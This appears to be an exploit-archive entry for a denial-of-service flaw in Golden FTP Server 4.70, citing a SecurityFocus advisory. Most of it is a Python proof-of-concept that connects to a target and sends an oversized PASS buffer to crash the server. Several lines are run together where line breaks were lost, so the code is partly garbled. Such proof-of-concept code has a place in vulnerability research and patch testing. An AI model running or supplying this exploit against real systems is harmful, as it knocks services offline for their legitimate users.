source: https://www.securityfocus.com/bid/45924/info
Golden FTP Server is prone to a denial-of-service vulnerability.
Exploits will cause the application to crash, denying service to legitimate users.
Golden FTP Server 4.70is vulnerable; other versions may also be affected.import socket
import sys
import time
Bs ='\x42' * 4buffer='\x41' * 533 + Bs + '\xcc' * 300iflen(sys.argv)!=3:print"Usage: ./goldenftp.py <ip> <port>"
sys.exit()
ip = sys.argv[1]
port = sys.argv[2]
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)try:print"[*] Sending evil buffer"
s.connect((ip,int(port)))
s.recv(1024)
time.sleep(2)
s.send('USER anonymous'+ '\r\n')
s.recv(1024)
time.sleep(3)
s.send('PASS ' + buffer + '\r\n')
s.recv(1024)
time.sleep(1)
s.close()except:print"Can't Connect to Server"
sys.exit()